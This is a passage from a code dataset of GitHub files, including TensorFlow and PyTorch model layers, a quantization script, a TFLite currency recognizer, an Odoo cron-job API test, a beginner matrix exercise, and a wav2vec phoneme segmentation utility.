pwise_conv(x, input_dim, output_dim, bias=bias, name='ex_dim')\n net = ins + net\n else:\n net = x + net\n return net\n\ndef conv2d_bn_6_block(x, input_dim, output_dim, is_train, filter_size=3, stride=1, bias=False, padding='SAME', name='conv_block'):\n with tf.variable_scope(name):\n net = conv2d(x, [filter_size, filter_size, input_dim, output_dim], stride=stride, bias=bias, padding=padding, name='conv')\n net = batch_norm(net, training=is_train, name='bn')\n out = relu6(net)\n return out\n\ndef pwise_bn_6_block(x, input_dim, output_dim, is_train, bias=False, name='pw_block'):\n with tf.variable_scope(name):\n net = pwise_conv(x, input_dim, output_dim, bias=bias, name='pw')\n net=batch_norm(net, training=is_train, name='bn')\n out = relu6(net)\n return out\n \ndef res_bn_6_block(x, input_dim, output_dim, expansion_ratio, is_train, channel_multiplier=1,\n filter_size=3, stride=1, bias=False, shortcut=True, name='res_block'):\n with tf.variable_scope(name):\n # pw\n bottleneck_dim=round(expansion_ratio*input_dim)\n net = pwise_conv(x, input_dim, bottleneck_dim, bias=bias, name='pw')\n net = batch_norm(net, training=is_train, name='pw_bn')\n net = relu6(net)\n # dw\n net = dwise_conv(net, bottleneck_dim, channel_multiplier, filter_size=filter_size, stride=stride, bias=bias, name='dw')\n net = batch_norm(net, training=is_train, name='dw_bn')\n net = relu6(net)\n # pw & linear\n net = pwise_conv(net, bottleneck_dim*channel_multiplier, output_dim, bias=bias, name='pw_linear')\n net = batch_norm(net, training=is_train, name='pw_linear_bn')\n \n # element wise add, only for stride==1\n if shortcut and stride == 1:\n in_dim=int(input_dim)\n if in_dim != output_dim:\n ins=pwise_conv(x,input_dim, output_dim, bias=bias, name='ex_dim')\n net=ins+net\n else:\n net=x+net\n return net \n'''\nEnd of Blocks\n'''\n","repo_name":"Jerry0103240/Lightweight-and-Dynamic-Deblurring-for-IoT-enabled-Smart-Cameras","sub_path":"train_utils/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":12127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19594112389","text":"lista1 = []\nlista2 = []\nlista3 = []\nmatriz = []\nsomapares = somacoluna = 0\nfor c in range(0, 3):\n lista1.append(int(input(f'Digite um valor para a [linha 0 coluna {c}]: ')))\nmatriz.append(lista1[:])\nfor i in range(0, 3):\n lista2.append(int(input(f'Digite um valor para a [linha 1 coluna {i}]: ')))\nmatriz.append(lista2[:])\nfor d in range(0, 3):\n lista3.append(int(input(f'Digite um valor para a [linha 2 coluna {d}]: ')))\nmatriz.append(lista3[:])\nfor num in matriz:\n print(f'[ {num[0]} ] [ {num[1]} ] [ {num[2]} ]')\nfor par in matriz:\n for j in range(0, len(par)):\n if par[j] % 2 ==0:\n somapares += par[j]\nfor colunaum in matriz:\n somacoluna += colunaum[2]\nprint('-=' * 20)\nprint(f'A soma de todos os valores pares é: {somapares}')\nprint(f'A soma dos valores da terceia coluna é: {somacoluna}')\nprint(f'O maior valor da segunda linha é {max(lista2)}')\nprint('-=' * 20)\nprint('\\033[33mFinalizado com Sucesso!\\033[m')","repo_name":"andreplacet/exercicios_python","sub_path":"exercicio87.py","file_name":"exercicio87.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33571745062","text":"import base64\nimport requests\nfrom odoo.tests import tagged\nfrom odoo.tests.common import HttpSavepointCase, get_db_name\nfrom odoo.tools import config\n\n@tagged(\"lavka\", 
\"cron_jobs\")\nclass TestCronJobs(HttpSavepointCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cron_jobs = cls.env['ir.cron'].search([\n ('active', 'in', [True, False])\n ])\n cls.job_ids = []\n for i, job in enumerate(cron_jobs):\n job.active = True\n job.suspended = False\n cls.job_ids.append(job.id)\n\n cls.demo_user = cls.env.ref('base.user_admin')\n cls.db_name = get_db_name()\n\n def request_by_token(self, user, authorized=True, *args, **kwargs):\n token = f\"{self.db_name}:{user.openapi_token}\"\n _token = base64.b64encode(token.encode()).decode()\n headers = {}\n if authorized:\n headers = {\n 'Authorization': f'Basic {_token}',\n }\n p = kwargs.get(\"params\")\n port = config[\"http_port\"]\n url = f'http://localhost:{port}/api/v1/cron_jobs'\n self.opener = requests.Session()\n return self.opener.request(\n 'GET', url, timeout=30, headers=headers, params=p\n )\n\n def test_jobs(self):\n # выключаем\n data = {\n \"action\": \"suspend\",\n }\n resp = self.request_by_token(self.demo_user, params=data)\n # self.env.cr.commit()\n self.assertEqual(resp.status_code, 200)\n resp_data = resp.json()\n jobs = {i['job']: i for i in resp_data['jobs']}\n\n suspended_cron_jobs = self.env['ir.cron'].search([])\n for job in suspended_cron_jobs:\n self.assertTrue(job.suspended, job.name)\n self.assertFalse(job.active, job.name)\n info = jobs[job.cron_name]\n self.assertEqual(info['active'], job.active)\n self.assertEqual(info['suspended'], job.suspended)\n # включаем\n data = {\n \"action\": \"active\",\n }\n\n resp = self.request_by_token(self.demo_user, params=data)\n self.assertEqual(resp.status_code, 200)\n resp_data = resp.json()\n jobs = {i['job']: i for i in resp_data['jobs']}\n active_cron_jobs = self.env['ir.cron'].search([])\n for job in active_cron_jobs:\n self.assertTrue(job.active)\n self.assertFalse(job.suspended)\n info = jobs[job.cron_name]\n self.assertEqual(info['active'], job.active)\n self.assertEqual(info['suspended'], job.suspended)\n # выключаем на всякий случай\n data = {\n \"action\": \"suspend\",\n }\n self.request_by_token(self.demo_user, params=data)\n\n\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests/backend/test_cron_job_controller.py","file_name":"test_cron_job_controller.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42315912791","text":"#import tensorflow as tf\nfrom tflite_runtime.interpreter import Interpreter\nfrom numpy import expand_dims, array, float32\n#from tensorflow.keras.preprocessing import image\n#import importlib\nfrom os import listdir\nimport cv2\nimport capture, preprocess, speak\nimport json\n\nwith open('config.json') as config_file:\n config = json.load(config_file)\n\n# capture = getattr(importlib.import_module(\"capture\"), \"capture\")\n# init_cam = getattr(importlib.import_module(\"capture\"), \"init_cam\")\n# release_cam = getattr(importlib.import_module(\"capture\"), \"release_cam\")\n# preprocess_captured = getattr(importlib.import_module(\"preprocess\"), \"preprocess_captured\")\n#is_object_present = getattr(importlib.import_module(\"preprocess\"), \"is_object_present\")\n\nif config['capture_enabled']:\n\tcam = capture.init_cam(config[\"camera_device_str\"])\n\tif cam == None:\n\t\tprint(\"Error opening camera. Exiting.. \")\n\t\tif config[\"speaker_enabled\"]:\n\t\t\tspeak.speak(\"Error opening camera. Exiting.. 
\")\n\t\texit\n\nmodel_name = config[\"model_name\"]\nclasses = {0: 'fifty_2',\n 1: 'five',\n 2: 'fivehundred_2',\n 3: 'hundred',\n 4: 'hundred_2',\n 5: 'ten_2',\n 6: 'twenty_2',\n 7: 'twohundred',\n 8: 'twothousand'}\n# Load TFLite model and allocate tensors.\ninterpreter = Interpreter(model_path=\"models/\" + model_name + \".tflite\")\ninterpreter.allocate_tensors()\n\n# Get input and output tensors.\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\n\n# Test model on input data.\ninput_shape = input_details[0]['shape']\n#print(input_shape)\nwhile True:\n\tt = input(\"Exit? [N/y] : \")\n\tif t=='n' or t=='N' or t=='':\n\t\tpass\n\telse:\n\t\tif config['capture_enabled']:\n\t\t\tcapture.release_cam(cam)\n\t\tbreak\n\tif config['capture_enabled']:\n\t\tcapture.capture(cam, display_enabled = config[\"display_enabled\"], speaker_enabled=config[\"speaker_enabled\"],\n\t\tcapture_count = config[\"capture_count\"], capture_delay = config[\"capture_delay\"])\n\tif config['preprocess_enabled']:\n\t\tpreprocess.preprocess_captured()\n\n\tmajor_class_list = [0 for _ in range(len(classes))]\n\tmajor_conf_list = [0 for _ in range(len(classes))]\n\tfor f in listdir(\"preprocessed/\"):\n\t\t#img = image.load_img(\"preprocessed/\" + f, target_size=tuple(input_shape[1:3]))\n\t\timg = cv2.imread(\"preprocessed/\" + f) \n\t\timg = cv2.resize(img, tuple(input_shape[1:3]))\n\t\tinput_data = array(img, dtype=float32)\n\t\tinput_data /= 255.\n\t\tinput_data = expand_dims(input_data, axis=0)\n\t\tinterpreter.set_tensor(input_details[0]['index'], input_data)\n\n\t\tinterpreter.invoke()\n\n\t\t# The function `get_tensor()` returns a copy of the tensor data.\n\t\t# Use `tensor()` in order to get a pointer to the tensor.\n\t\toutput_data = interpreter.get_tensor(output_details[0]['index'])\n\t\tbestclass = 0\n\t\toutput_data = output_data[0]\n\t\tfor i in range(len(output_data)):\n\t\t\tif (output_data[i] > output_data[bestclass]):\n\t\t\t\tbestclass = i\n\t\tprint(classes[bestclass], \"Confidence : %.2f\" % output_data[bestclass])\n\t\tmajor_class_list[bestclass] += 1\n\t\tmajor_conf_list += output_data\n\t\n\tmajor_class = major_class_list.index(max(major_class_list))\n\tmajor_conf = major_conf_list[major_class] / major_class_list[major_class]\n\tmajor_class = list(classes[major_class].split('_'))\n\tif len(major_class) > 0:\n\t\tmajor_class = major_class[0] + \" type \" + major_class[1]\n\telse:\n\t\tmajor_class = major_class[0]\n\tif config[\"speaker_enabled\"]:\n\t\t\tspeak.speak_currency(major_class, round(major_conf, 2)*100)\n\t\t#os.remove(\"input/\"+f)\n\n","repo_name":"hemankundu/indian-currency-recognizer","sub_path":"Raspberry Pi files/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"74434905171","text":"import random\nimport argparse\nimport sys\n\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\n\nfrom model import DeepFMs\nfrom utils import data_preprocess\nfrom utils.parameters import get_parser\nfrom utils.util import get_model, load_model_dic, get_logger\nfrom model.Datasets import Dataset, get_dataset\n\nimport torch\nfrom torchsummary import summary\n\nif __name__ == '__main__':\n parser = get_parser()\n pars = parser.parse_args()\n\n logger = get_logger('Quantization')\n logger.info(pars)\n\n field_size, train_dict, valid_dict, test_dict = get_dataset(pars)\n\n if not pars.save_model_path:\n 
logger.info(\"no model path given: -save_model_path\")\n sys.exit()\n\n model = get_model(field_size=field_size, cuda=pars.use_cuda and torch.cuda.is_available(),\n feature_sizes=train_dict['feature_sizes'], pars=pars, logger=logger)\n model = load_model_dic(model, pars.save_model_path, sparse=pars.prune)\n\n #summary(model, [(train_dict['index'].shape[1], 1), (train_dict['value'].shape[1], )], dtypes=[torch.long, torch.float], device=torch.device(\"cpu\"))\n\n if pars.use_cuda:\n model.cuda()\n\n logger.info('Original model:')\n model.print_size_of_model()\n model.run_benchmark(test_dict['index'], test_dict['value'], test_dict['label'], cuda=pars.use_cuda)\n\n # dynamic quantization (no CUDA allowed and dynamic after training)\n # https://pytorch.org/tutorials/recipes/recipes/dynamic_quantization.html\n # not really best for our use case:\n # This is used for situations where the model execution time is dominated by loading weights from memory rather than computing the matrix multiplications.\n # This is true for for LSTM and Transformer type models with small batch size.\n if pars.dynamic_quantization:\n quantized_model = load_model_dic(\n get_model(field_size=field_size, cuda=0, feature_sizes=train_dict['feature_sizes'],\n dynamic_quantization=True, pars=pars, logger=logger), pars.save_model_path,\n sparse=pars.prune) # no logger allowed here\n\n quantized_model.eval()\n quantized_model = torch.quantization.quantize_dynamic(quantized_model, {torch.nn.Linear}, dtype=torch.qint8)\n\n logger.info(\"Dynamic Quantization model:\")\n q = quantized_model.print_size_of_model()\n # logger.info(\"\\t{0:.2f} times smaller\".format(f / q))\n # logger.info(quantized_model)\n\n quantized_model.run_benchmark(test_dict['index'], test_dict['value'], test_dict['label'])\n\n torch.save(quantized_model.state_dict(), pars.save_model_path + '_dynamic_quant')\n\n # most commonly used form of quantization\n # embedding quantization in pytorch 1.7.1\n # Support for FP16 quantization\n # Embedding and EmbeddingBag quantization (8-bit + partial support for 4-bit)\n # https://discuss.pytorch.org/t/is-it-planned-to-support-nn-embeddings-quantization/89154\n # https://github.com/pytorch/pytorch/issues/41396\n if pars.static_quantization: # https://pytorch.org/tutorials/advanced/static_quantization_tutorial.html\n quantized_model = load_model_dic(\n get_model(field_size=field_size, cuda=0, feature_sizes=train_dict['feature_sizes'],\n static_quantization=True, pars=pars, logger=logger), pars.save_model_path, sparse=pars.prune)\n quantized_model.eval()\n\n quantized_model.qconfig = torch.quantization.get_default_qconfig('fbgemm')\n #quantized_model.qconfig = torch.quantization.get_default_qconfig('qnnpack')\n #quantized_model.qconfig = torch.quantization.default_qconfig\n\n quantized_model = torch.quantization.fuse_modules(quantized_model,\n [['net_1_linear_1', 'net_1_linear_1_relu'],\n ['net_1_linear_2', 'net_1_linear_2_relu'],\n ['net_1_linear_3', 'net_1_linear_3_relu']])\n\n torch.quantization.prepare(quantized_model, inplace=True)\n\n #logger.info(quantized_model)\n\n # Calibrate\n quantized_model.static_calibrate = True\n calibration_size = quantized_model.batch_size * 5\n Xi = train_dict['index'][:calibration_size]\n Xv = train_dict['value'][:calibration_size]\n y = train_dict['label'][:calibration_size]\n Xi = np.array(Xi).reshape((-1, quantized_model.field_size - quantized_model.num, 1))\n Xv = np.array(Xv)\n y = np.array(y)\n x_size = Xi.shape[0]\n quantized_model.eval()\n quantized_model.eval_by_batch(Xi, Xv, 
y, x_size)\n logger.info('Post Static Quantization: Calibration done')\n\n # Convert to quantized model\n quantized_model.static_calibrate = False\n torch.quantization.convert(quantized_model, inplace=True)\n\n # logger.info(quantized_model)\n logger.info(\"Post Static Quantization model:\")\n quantized_model.print_size_of_model()\n quantized_model.run_benchmark(test_dict['index'], test_dict['value'], test_dict['label'], cuda=pars.use_cuda)\n\n torch.save(quantized_model.state_dict(), pars.save_model_path + '_static_quant')\n\n # QAT supports CUDA with fake quantization: https://pytorch.org/docs/stable/quantization.html\n # convertion happens in evaluation method\n if pars.quantization_aware:\n quantized_model = get_model(field_size=field_size, cuda=1, feature_sizes=train_dict['feature_sizes'],\n quantization_aware=True, pars=pars, logger=logger)\n quantized_model.cuda()\n quantized_model.qconfig = torch.quantization.get_default_qat_qconfig('fbgemm')\n\n logger.info(quantized_model.qconfig)\n\n torch.quantization.prepare(quantized_model, inplace=True)\n #logger.info(quantized_model)\n quantized_model.fit(train_dict['index'], train_dict['value'], train_dict['label'], valid_dict['index'],\n valid_dict['value'], valid_dict['label'],\n prune=pars.prune, prune_fm=pars.prune_fm, prune_r=pars.prune_r, prune_deep=pars.prune_deep,\n emb_r=pars.emb_r, emb_corr=pars.emb_corr,\n quantization_aware=True)\n\n torch.save(quantized_model.state_dict(), pars.save_model_path + '_quant_aware')\n\n logger.info(\"Quantization Aware model:\")\n state_dict = torch.load(pars.save_model_path + '_quant_aware')\n quantized_model.load_state_dict(state_dict)\n quantized_model.to('cpu')\n quantized_model.eval()\n\n quantized_model.quantization_aware = True\n quantized_model.use_cuda = False\n\n q = quantized_model.print_size_of_model()\n # logger.info(\"\\t{0:.2f} times smaller\".format(f / q))\n quantized_model.run_benchmark(test_dict['index'], test_dict['value'], test_dict['label'], cuda=False)\n","repo_name":"BingzhangZhu/CTR_prediction","sub_path":"xsDeepFwFM_deprecated/quantization.py","file_name":"quantization.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21607703821","text":"# noinspection PyPep8Naming\nimport copy\nfrom dataclasses import dataclass\nfrom typing import Sequence, Optional\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\n\nfrom arch.model import InvertResidualNetBlockMetaHyperparameters, SqueezeNASNet, \\\n InverseResidualMetaNetHyperparameters\nfrom arch.operations import Ops\n\n\n@dataclass(frozen=True)\nclass SqueezeNASNetCityscapesHyperparameters:\n init_channels: int\n blocks: Sequence[InvertResidualNetBlockMetaHyperparameters]\n num_classes: int\n skip_output_block_index: int\n mid_channels: int\n last_channels: Optional[int] = None\n\n def to_ds_mobile_net_hyperparameters(self, last_channels, num_classes, last_pooled_channels=None):\n if self.last_channels is not None:\n assert last_channels is None\n if self.last_channels is not None:\n last_channels = self.last_channels\n return InverseResidualMetaNetHyperparameters(init_channels=self.init_channels,\n blocks=copy.deepcopy(tuple(self.blocks)),\n last_channels=last_channels,\n num_classes=num_classes, last_pooled_channels=last_pooled_channels)\n\n\nclass Conv_BN_ReLU(nn.Module):\n def __init__(self, in_channels, out_channels, kernel, padding=0, dilation=1, groups=1, 
stride=1,\n transpose: bool = False):\n super().__init__()\n if transpose is False:\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=kernel, padding=padding,\n bias=False, dilation=dilation, groups=groups, stride=stride)\n else:\n self.conv = nn.ConvTranspose2d(in_channels, out_channels, kernel_size=kernel, padding=padding,\n bias=False, dilation=dilation, groups=groups, stride=stride)\n self.bn = nn.BatchNorm2d(out_channels)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n x = self.relu(x)\n return x\n\n\nclass ASPP(nn.Module):\n def __init__(self, in_ch: int, mid_ch: int, out_ch: int, rates=(6, 12, 18), groups=(1, 1, 1)):\n super().__init__()\n self._1x1_1_conv = Conv_BN_ReLU(in_ch, mid_ch, kernel=1)\n self._3x3_1_conv = Conv_BN_ReLU(in_ch, mid_ch, kernel=3, padding=rates[0], dilation=rates[0], groups=groups[0])\n self._3x3_2_conv = Conv_BN_ReLU(in_ch, mid_ch, kernel=3, padding=rates[1], dilation=rates[1], groups=groups[1])\n self._3x3_3_conv = Conv_BN_ReLU(in_ch, mid_ch, kernel=3, padding=rates[2], dilation=rates[2], groups=groups[2])\n self._1x1_2_conv = Conv_BN_ReLU(mid_ch * 4 + in_ch, out_ch, kernel=1)\n\n def forward(self, x):\n b, c, h, w = x.shape\n tmp1 = self._1x1_1_conv(x)\n tmp2 = self._3x3_1_conv(x)\n tmp3 = self._3x3_2_conv(x)\n tmp4 = self._3x3_3_conv(x)\n avg_pooled = F.avg_pool2d(x, (h, w), stride=(1, 1), padding=0, ceil_mode=False, count_include_pad=False)\n img_pool = F.interpolate(avg_pooled, size=(h, w), mode='nearest')\n tmp6 = torch.cat([tmp1, tmp2, tmp3, tmp4, img_pool], dim=1)\n return self._1x1_2_conv(tmp6)\n\n\nclass ASPP_Lite(nn.Module):\n def __init__(self, os16_channels, os8_channels, mid_channels, num_classes: int):\n super().__init__()\n self._1x1_TL = Conv_BN_ReLU(os16_channels, mid_channels, kernel=1)\n self._1x1_BL = nn.Conv2d(os16_channels, mid_channels, kernel_size=1) # TODO: bias=False?\n self._1x1_TR = nn.Conv2d(mid_channels, num_classes, kernel_size=1)\n self._1x1_BR = nn.Conv2d(os8_channels, num_classes, kernel_size=1)\n self.avgpool = torch.nn.AvgPool2d(kernel_size=49, stride=[16, 20], count_include_pad=False)\n\n def forward(self, os16, os8):\n assert os16.shape[-1] * 2 == os8.shape[-1], (os8.shape, os16.shape)\n t1 = self._1x1_TL(os16)\n B, C, H, W = t1.shape\n t2 = self.avgpool(os16)\n t2 = self._1x1_BL(t2)\n t2 = torch.sigmoid(t2)\n t2 = F.interpolate(t2, size=(H, W), mode='bilinear', align_corners=False)\n t3 = t1 * t2\n t3 = F.interpolate(t3, scale_factor=2, mode='bilinear', align_corners=False)\n t3 = self._1x1_TR(t3)\n t4 = self._1x1_BR(os8)\n return t3 + t4\n\n\nclass SqueezeNASNetCityscapes(nn.Module):\n def __init__(self, hyperparams: SqueezeNASNetCityscapesHyperparameters, genotype: Sequence[Ops], lr_aspp=True):\n super().__init__()\n self.hyperparams = hyperparams\n self.genotype = genotype\n self.lr_aspp = lr_aspp\n\n self.encoder = SqueezeNASNet(\n hyperparams=hyperparams.to_ds_mobile_net_hyperparameters(last_channels=None, num_classes=None),\n genotype=genotype)\n\n self.criterion = CrossEntropyLoss(ignore_index=255)\n\n mid_ch = hyperparams.mid_channels\n\n low_level_channels = None\n count = 0\n for block in hyperparams.blocks:\n count += block.num_repeat\n if count > self.hyperparams.skip_output_block_index:\n low_level_channels = block.num_channels\n break\n\n assert low_level_channels is not None\n\n if hyperparams.last_channels:\n last_channels = hyperparams.last_channels\n else:\n last_channels = hyperparams.blocks[-1].num_channels\n\n if self.lr_aspp:\n 
self.decoder = ASPP_Lite(os16_channels=last_channels, os8_channels=low_level_channels,\n mid_channels=mid_ch, num_classes=hyperparams.num_classes)\n else:\n self.decoder = ASPP(in_ch=last_channels, mid_ch=mid_ch, out_ch=mid_ch, groups=(mid_ch,) * 3)\n self.lowlevel1x1 = nn.Conv2d(low_level_channels, low_level_channels, 1)\n self.logits2 = Conv_BN_ReLU(mid_ch + low_level_channels, mid_ch + low_level_channels, 3,\n groups=mid_ch + low_level_channels, padding=1)\n self.logits3 = nn.Conv2d(low_level_channels + mid_ch, hyperparams.num_classes, kernel_size=1)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def forward(self, normalized_rgb, gt=None, rgb=None, fname=None):\n encoder_outputs = self.encoder(normalized_rgb)\n residuals_outputs = encoder_outputs['residuals_outputs']\n cur_feat = encoder_outputs['output']\n\n b, c, h, w = cur_feat.shape\n assert w >= h, cur_feat.shape\n\n low_level_feat = residuals_outputs[self.hyperparams.skip_output_block_index]\n\n if self.lr_aspp:\n logits = self.decoder(cur_feat, low_level_feat)\n logits = F.interpolate(logits, scale_factor=8, mode='bilinear', align_corners=True)\n\n else:\n logits = self.decoder(cur_feat)\n logits = F.interpolate(logits, scale_factor=4, mode='bilinear', align_corners=True)\n low_level_feat = self.lowlevel1x1(low_level_feat)\n logits = torch.cat((logits, low_level_feat), dim=1)\n logits = self.logits2(logits)\n logits = self.logits3(logits)\n logits = F.interpolate(logits, scale_factor=4, mode='bilinear', align_corners=True)\n\n if gt is None:\n return {'preds': logits}\n\n logits = logits.float()\n loss = self.criterion(logits, gt)\n return {'loss': loss, 'preds': logits}\n","repo_name":"ashaw596/squeezenas","sub_path":"arch/model_cityscapes.py","file_name":"model_cityscapes.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"66"} +{"seq_id":"36604066316","text":"import copy\nfrom typing import Optional, Any\nimport torch\nfrom torch import Tensor\nfrom torch.nn import functional as F \n \nclass MultiheadAttention(torch.nn.Module):\n def __init__(self,d_query:int,d_key:int,d_value:int, nhead:int, dropout=0.1):\n super(MultiheadAttention, self).__init__()\n # d_query = int(d_query/nhead)\n # d_key = int(d_key/nhead)\n\n self.dropout = torch.nn.Dropout(dropout)\n self.head_dim = d_value\n self.nhead = nhead\n self.scaling = float(d_query) ** -0.5\n self.d_query = d_query\n self.d_key = d_key\n self.d_value = d_value\n hidden_dim = 256\n # self.query_linear = torch.nn.Linear(nhead*d_query,nhead*d_query)\n # self.key_linear = torch.nn.Linear(nhead*d_key,nhead*d_key)\n self.query_linear = torch.nn.Sequential(torch.nn.Linear(d_query,hidden_dim),torch.nn.ReLU(),torch.nn.Linear(hidden_dim,nhead*d_query))\n self.key_linear = torch.nn.Sequential(torch.nn.Linear(d_key,hidden_dim),torch.nn.ReLU(),torch.nn.Linear(hidden_dim,nhead*d_key))\n self.value_linear = torch.nn.Sequential(torch.nn.Linear(d_value,hidden_dim),torch.nn.ReLU(),torch.nn.Linear(hidden_dim,nhead*d_value))\n # self.query_linear = torch.nn.Linear(d_query,nhead*d_query)\n # self.key_linear = torch.nn.Linear(d_key,nhead*d_key)\n # self.value_linear = torch.nn.Linear(d_value,nhead*d_value)\n self.out_linear = torch.nn.Linear(nhead*d_value,d_value)\n \n def forward(self,query: Tensor,key: Tensor, value: 
Tensor,attn_mask: Optional[Tensor] = None) -> Tensor:\n tgt_len, bsz, _ = query.size()\n query = self.query_linear(query)\n key = self.key_linear(key)\n value = self.value_linear(value)\n \n query *= self.scaling\n \n query = query.contiguous().view(tgt_len, bsz * self.nhead, self.d_query).transpose(0, 1)\n key = key.contiguous().view(-1, bsz * self.nhead, self.d_key).transpose(0, 1)\n value = value.contiguous().view(-1, bsz * self.nhead, self.d_value).transpose(0, 1)\n\n attn_output_weights = torch.bmm(query, key.transpose(1, 2))\n if attn_mask is not None:\n attn_mask = torch.repeat_interleave(attn_mask, self.nhead, dim=0)\n if attn_mask.dtype == torch.bool:\n attn_output_weights.masked_fill_(attn_mask, float('-inf'))\n else:\n attn_output_weights += attn_mask\n attn_output_weights = F.softmax(attn_output_weights, dim=-1)\n #print (torch.where(torch.isnan(attn_output_weights)))\n #exit()\n attn_output_weights = self.dropout(attn_output_weights)\n attn_output = torch.bmm(attn_output_weights, value)\n attn_output = attn_output.transpose(0, 1).contiguous().view(tgt_len, bsz,self.nhead*self.d_value)\n attn_output = self.out_linear(attn_output)\n return attn_output\n\n\nclass AttentionLayer(torch.nn.Module):\n def __init__(self,d_query,d_key,d_value,nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"):\n super(AttentionLayer, self).__init__()\n self.self_attn1 = MultiheadAttention(d_query,d_key,d_value, nhead,dropout=dropout)\n self.self_attn2 = MultiheadAttention(d_value,d_value,d_value, nhead,dropout=dropout)\n\n self.linear1 = torch.nn.Linear(d_value, dim_feedforward)\n self.linear2 = torch.nn.Linear(dim_feedforward, d_value)\n self.norm = torch.nn.LayerNorm(d_value)\n self.activation = torch.nn.ReLU()\n\n def forward(self, query: Tensor, key: Tensor, value: Tensor,src_mask: Optional[Tensor] = None) -> Tensor:\n src = self.self_attn1(query, key, value, src_mask)\n src[torch.isnan(src)] = 0\n src = self.linear2(self.activation(self.linear1(src)))\n\n # src = self.self_attn2(query, key, src, src_mask)\n # src = self.linear2(self.dropout(self.activation(self.linear1(self.activation(src)))))\n # src[torch.isnan(src)] = 0\n\n # src = self.self_attn2(src, src, src, src_mask)\n # src = self.linear2(self.dropout(self.activation(self.linear1(self.activation(src)))))\n # src[torch.isnan(src)] = 0\n\n return src\n","repo_name":"pbansal5/DeepMVI","sub_path":"layer_transformer.py","file_name":"layer_transformer.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"66"} +{"seq_id":"39651007872","text":"import os\nimport argparse\nimport json\nimport numpy as np\nimport pandas as pd\nimport soundfile as sf\nfrom tqdm import tqdm\nimport torch\nfrom torch import nn\nfrom torch.utils.data import Dataset, DataLoader\nimport transformers\nfrom transformers import (\n AutoConfig,\n AutoTokenizer,\n AutoFeatureExtractor,\n Wav2Vec2Processor,\n Wav2Vec2ForAudioFrameClassification,\n Trainer, \n TrainingArguments,\n)\nfrom datasets import load_dataset\nimport evaluate\nfrom sklearn import metrics\nfrom utils import *\nfrom models import CustomWav2Vec2Segmentation\n\n\ndef get_metadata(path,_set=None,_locale=None):\n \"\"\"\n Return metadata with specific set and locale\n \n Args\n ----\n path : str\n filepath of metadata.csv\n _set : str/list[str]/bool\n the set(s) it contains, only support combination \n of ['train','dev','test'], default None to select \n all sets\n _locale:\n the locale(s) it contain, default None 
to select \n all sets\n \n Return\n ------\n metadata : pd.DataFrame\n selected metadata \n \"\"\"\n metadata = pd.read_csv(path)\n if _set is not None:\n if isinstance(_set,list):\n metadata = metadata[(metadata['set'].isin(_set))]\n else:\n metadata = metadata[(metadata['set'] == _set)]\n if _locale is not None:\n if isinstance(_locale,list):\n metadata = metadata[(metadata['locale'].isin(_locale))]\n else:\n metadata = metadata[(metadata['locale'] == _locale)]\n return metadata\n\n\ndef get_vocab_dict(data,pad=None,unk=None):\n \"\"\"\n Return a dictionary of tokens from a sequence of \n phonemes_detail in the metadata\n \n Args\n ----\n data : list[str]\n sequence of phonemes_detail, this method will transform\n the string in phonemes_detail as dict \n pad : str\n padding token, default : 'PAD'\n unk: str\n unknown token, default : 'UNK'\n \n Return\n ------\n vocab_dict : dict\n dictionary of tokens\n \n Example\n -------\n \n pad = '[PAD]'\n unk = '[UNK]'\n data = metadata['phonemes_detail']\n vocab_dict = get_vocab_dict(data,pad,unk)\n \n \"\"\"\n pad = 'PAD' if pad is None else pad\n unk = 'UNK' if unk is None else unk\n dictionary = {pad:0}\n lb = 1\n for phonemes_detail in tqdm(data):\n phonemes_detail = eval(phonemes_detail)\n phonemes = phonemes_detail['label']\n for phoneme in phonemes:\n if phoneme not in dictionary.keys():\n dictionary[phoneme] = lb\n lb += 1\n dictionary[unk] = lb # use the configured unknown token, not a hard-coded 'UNK'\n return dictionary\n\n\nclass PhonemeSegmentor:\n \"\"\"\n Encodes a phonemes_detail segmentation into a fixed-resolution\n array of token ids, and decodes such arrays back into segments.\n \"\"\"\n def __init__(self,tokenizer,resolution,t_end=None,pad_token=\"[PAD]\"):\n self.tokenizer = tokenizer\n self.t_end = t_end\n self.resolution = resolution\n self.pad_token = pad_token\n pass\n \n def encode(self,phonemes_detail,**kwargs):\n t_end = kwargs.get('t_end',self.t_end) if kwargs.get('t_end',self.t_end) else self.get_t_end(phonemes_detail)\n arr = [self.tokenizer.encode(self.pad_token)[0] for _ in range(int(np.round(t_end/self.resolution)))]\n phonemes_detail = eval(phonemes_detail) if type(phonemes_detail) is not dict else phonemes_detail\n for a,b,label in zip(phonemes_detail['start'],phonemes_detail['end'],phonemes_detail['label']):\n a = int(np.round(a/self.resolution))\n b = int(np.round(b/self.resolution))\n arr[a:b] = [self.tokenizer.encode(label)[0]]*len(arr[a:b])\n return arr\n \n def decode(self,arr):\n dec = 